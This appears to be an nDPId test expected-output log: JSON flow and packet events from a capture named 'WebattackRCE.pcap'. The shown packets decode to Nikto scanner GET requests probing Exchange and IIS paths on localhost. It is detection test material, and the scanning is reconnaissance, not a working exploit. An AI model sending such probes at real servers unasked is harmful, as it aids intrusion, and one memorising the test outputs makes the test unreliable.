-00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 